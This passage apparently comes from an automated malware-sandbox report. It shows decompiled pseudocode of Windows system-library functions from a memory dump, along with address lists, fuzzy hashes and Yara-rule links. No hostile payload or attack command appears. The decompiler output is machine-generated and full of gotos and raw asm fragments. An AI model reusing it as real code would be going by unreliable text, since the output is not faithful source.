						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                      0x053c3893
                                      0x053c3896
                                      0x053c3899
                                      0x053c389f
                                      0x053c38a0
                                      0x053c38a4
                                      0x053c38a9
                                      0x053c38ac
                                      0x053c38ad
                                      0x053c38ae
                                      0x053c38af
                                      0x053c38b1
                                      0x053c38b4
                                      0x053c38bb
                                      0x053c38bc
                                      0x053c38bd
                                      0x053c38c4
                                      0x053c38c8
                                      0x053c38ca
                                      0x053c38ca
                                      0x053c38d5
                                      0x053c393e
                                      0x053c3940
                                      0x053c3942
                                      0x053c3952
                                      0x053c3954
                                      0x053c3961
                                      0x053c3961
                                      0x053c3967
                                      0x053c396e
                                      0x053c396e
                                      0x053c3947
                                      0x053c394c
                                      0x00000000
                                      0x053c394c
                                      0x053c38ea
                                      0x053c38ee
                                      0x053c38f8
                                      0x053c38f9
                                      0x053c38ff
                                      0x053c3900
                                      0x053c3902
                                      0x053c3903
                                      0x053c390b
                                      0x053c390f
                                      0x053c3950
                                      0x00000000
                                      0x053c3950
                                      0x053c3915
                                      0x053c391d
                                      0x053c391d
                                      0x053c3922
                                      0x053c3926
                                      0x00000000
                                      0x053c3928
                                      0x053c392b
                                      0x053c392b
                                      0x053c3935
                                      0x053c3937
                                      0x053c3937
                                      0x00000000
                                      0x053c3935
                                      0x053c3926
                                      0x053c38f0
                                      0x00000000

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID: BinaryName
                                      • API String ID: 2994545307-215506332
                                      • Opcode ID: 155eb3d28e7297b9c946ef723ee0617035333245200a4abe99d9b3cb0ecc2275
                                      • Instruction ID: f9692fed8d25b0bb5af7f542791c2612b79796f0497afcc4a0378147e883a9ce
                                      • Opcode Fuzzy Hash: 155eb3d28e7297b9c946ef723ee0617035333245200a4abe99d9b3cb0ecc2275
                                      • Instruction Fuzzy Hash: D031F432904619EFDB15EA58C945F7BBB75FF40B20F0185ADE915AB250D6309E00C7A1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0537D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 33%
                                      			E0537D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x543d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E05364120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0538B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E053898D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E053895D0();
					L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                      0x0537d29c
                                      0x0537d2a6
                                      0x0537d2b1
                                      0x0537d2b5
                                      0x0537d2b6
                                      0x0537d2bc
                                      0x0537d2bd
                                      0x0537d2be
                                      0x0537d2bf
                                      0x0537d2c2
                                      0x0537d2c4
                                      0x0537d2cc
                                      0x0537d384
                                      0x0537d34b
                                      0x0537d34f
                                      0x0537d350
                                      0x0537d351
                                      0x0537d35c
                                      0x0537d35c
                                      0x0537d2d6
                                      0x0537d2da
                                      0x0537d2e1
                                      0x0537d361
                                      0x0537d369
                                      0x0537d36d
                                      0x0537d2e3
                                      0x0537d2e3
                                      0x0537d2e3
                                      0x0537d2e5
                                      0x0537d2ed
                                      0x0537d2f5
                                      0x0537d2fa
                                      0x0537d302
                                      0x0537d303
                                      0x0537d30b
                                      0x0537d30f
                                      0x0537d313
                                      0x0537d318
                                      0x0537d31c
                                      0x0537d320
                                      0x0537d379
                                      0x0537d37d
                                      0x00000000
                                      0x00000000
                                      0x053baffe
                                      0x053bb001
                                      0x053bb011
                                      0x00000000
                                      0x0537d322
                                      0x0537d322
                                      0x0537d330
                                      0x0537d337
                                      0x0537d35d
                                      0x0537d339
                                      0x0537d33f
                                      0x0537d38c
                                      0x0537d38c
                                      0x0537d33f
                                      0x0537d349
                                      0x00000000
                                      0x0537d349

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: 95ee78bc266a86f31202062bbd04333c3c088230dfbce955ba40acdbdcd6371c
                                      • Instruction ID: d7492d1948da299f9d6cbb4c3944f895e33b7364bd8dea7f07f4893eb1db01b8
                                      • Opcode Fuzzy Hash: 95ee78bc266a86f31202062bbd04333c3c088230dfbce955ba40acdbdcd6371c
                                      • Instruction Fuzzy Hash: 1D31A7719083099FD721DF68C984E6BBBE9FF85654F00092EF59583610D638DD05CBA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05351B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 72%
                                      			E05351B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0538BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0538A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0538A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L05364620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                      0x05351b8f
                                      0x05351b9a
                                      0x05351b9c
                                      0x05351b9e
                                      0x05351ba3
                                      0x053a7010
                                      0x053a7010
                                      0x00000000
                                      0x05351ba9
                                      0x05351ba9
                                      0x05351bae
                                      0x00000000
                                      0x05351bc5
                                      0x05351bca
                                      0x05351bcf
                                      0x05351bd0
                                      0x05351bd1
                                      0x05351bd2
                                      0x05351bd6
                                      0x05351bdc
                                      0x05351be0
                                      0x053a6ffc
                                      0x053a7000
                                      0x00000000
                                      0x053a7006
                                      0x053a7009
                                      0x053a7009
                                      0x05351be6
                                      0x05351bec
                                      0x05351c0b
                                      0x05351c0b
                                      0x05351c0c
                                      0x05351c11
                                      0x05351c12
                                      0x05351c15
                                      0x05351c1b
                                      0x05351c1f
                                      0x05351c31
                                      0x05351c33
                                      0x053a7026
                                      0x053a7026
                                      0x05351c21
                                      0x05351c24
                                      0x05351c24
                                      0x05351bee
                                      0x05351bee
                                      0x05351bf2
                                      0x05351c3a
                                      0x05351bf4
                                      0x05351bf4
                                      0x05351c05
                                      0x05351c05
                                      0x05351c09
                                      0x05351c3e
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x05351c09
                                      0x05351bec
                                      0x05351be0
                                      0x05351bae
                                      0x05351c2e

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: WindowsExcludedProcs
                                      • API String ID: 0-3583428290
                                      • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                      • Instruction ID: b1723b337a4a32cfd548ba5ba269964d6dbd68c5f5f4564fe0321b776d2a0694
                                      • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                      • Instruction Fuzzy Hash: B5212637A04228ABCB22EA55C884F6FB7AEFF81A70F054425FD95DB210D675DD01C7A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0536F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0536F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                      0x0536f71d
                                      0x0536f722
                                      0x0536f726
                                      0x053b4770
                                      0x0536f765
                                      0x0536f769
                                      0x0536f769
                                      0x0536f732
                                      0x053b477a
                                      0x00000000
                                      0x053b477a
                                      0x0536f738
                                      0x0536f73a
                                      0x0536f73c
                                      0x0536f73f
                                      0x0536f746
                                      0x0536f778
                                      0x0536f7a9
                                      0x0536f7a9
                                      0x0536f754
                                      0x0536f75a
                                      0x0536f75d
                                      0x0536f75f
                                      0x0536f761
                                      0x0536f76f
                                      0x0536f771
                                      0x0536f771
                                      0x0536f76f
                                      0x0536f763
                                      0x00000000
                                      0x0536f763
                                      0x0536f77d
                                      0x0536f7a3
                                      0x0536f7a5
                                      0x00000000
                                      0x0536f7a5
                                      0x0536f77f
                                      0x0536f782
                                      0x0536f784
                                      0x0536f786
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0536f788
                                      0x0536f748
                                      0x0536f74d
                                      0x0536f78d
                                      0x0536f793
                                      0x0536f7b7
                                      0x0536f7bc
                                      0x00000000
                                      0x0536f7bc
                                      0x0536f798
                                      0x00000000
                                      0x00000000
                                      0x0536f79d
                                      0x0536f7b0
                                      0x00000000
                                      0x0536f7b0
                                      0x0536f79f
                                      0x00000000
                                      0x0536f74f
                                      0x0536f74f
                                      0x00000000
                                      0x0536f74f

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: Actx
                                      • API String ID: 0-89312691
                                      • Opcode ID: 0da9a5566969a795e16dcf0d2181554bdad3d8ac69a332cb214df9a068d5c467
                                      • Instruction ID: 8571b79e29ec929fef62f72942e02dfda858c8a2ee3e6c2e24145ef5b592e731
                                      • Opcode Fuzzy Hash: 0da9a5566969a795e16dcf0d2181554bdad3d8ac69a332cb214df9a068d5c467
                                      • Instruction Fuzzy Hash: 8A11B6353086028BEB248E1DA591776729BBB956E4F24C53EE466CB79DDBF1C8408343
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053F8DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 71%
                                      			E053F8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x5420d50);
				E0539D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E053D5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0539DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0539DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0539D130(_t34, _t39, _t40);
			}





                                      0x053f8df1
                                      0x053f8df1
                                      0x053f8df1
                                      0x053f8df1
                                      0x053f8df1
                                      0x053f8df1
                                      0x053f8df3
                                      0x053f8df8
                                      0x053f8dfd
                                      0x053f8e00
                                      0x053f8e0e
                                      0x053f8e2a
                                      0x053f8e36
                                      0x053f8e38
                                      0x053f8e3c
                                      0x053f8e46
                                      0x053f8e46
                                      0x053f8e36
                                      0x053f8e50
                                      0x053f8e56
                                      0x053f8e59
                                      0x053f8e5c
                                      0x053f8e60
                                      0x053f8e67
                                      0x053f8e6d
                                      0x053f8e73
                                      0x053f8e74
                                      0x053f8eb1
                                      0x053f8ebd

                                      Strings
                                      • Critical error detected %lx, xrefs: 053F8E21
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: Critical error detected %lx
                                      • API String ID: 0-802127002
                                      • Opcode ID: 7b958aed072d37ef41ee90c0efd0a235a239ce75ced772d08893100af036fae1
                                      • Instruction ID: 7b1631723d96e33d7060fd4399ed1b9c7353cb296d8487a01a502e5f78f4ec7a
                                      • Opcode Fuzzy Hash: 7b958aed072d37ef41ee90c0efd0a235a239ce75ced772d08893100af036fae1
                                      • Instruction Fuzzy Hash: FB1157B5E15348DADF28CFA8860ABDCFBB1BB14354F24465ED529AB392C3744602CF14
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053DFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                      Download Yara Rule
                                      Strings
                                      • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 053DFF60
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                      • API String ID: 0-1911121157
                                      • Opcode ID: c149b39337b6762b23600356e0e167b235bb1018de30d86ea0ddf744c3218c89
                                      • Instruction ID: 2844284722eb6d6a7a7c7f87203f3e3d0f11ab847d143c763dea597760f9001b
                                      • Opcode Fuzzy Hash: c149b39337b6762b23600356e0e167b235bb1018de30d86ea0ddf744c3218c89
                                      • Instruction Fuzzy Hash: 7C118EB2A10184AFDF16DB50D98AFD8FBB1FB08705F148454E50A56661C7799A40DB70
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05415BA5, Relevance: .6, Instructions: 592COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 88%
                                      			E05415BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x5421178);
				E0539D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E05414C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0538D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E05415542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x54360e8;
								if( *0x54360e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x54360e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E05389710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E05386DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0538F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
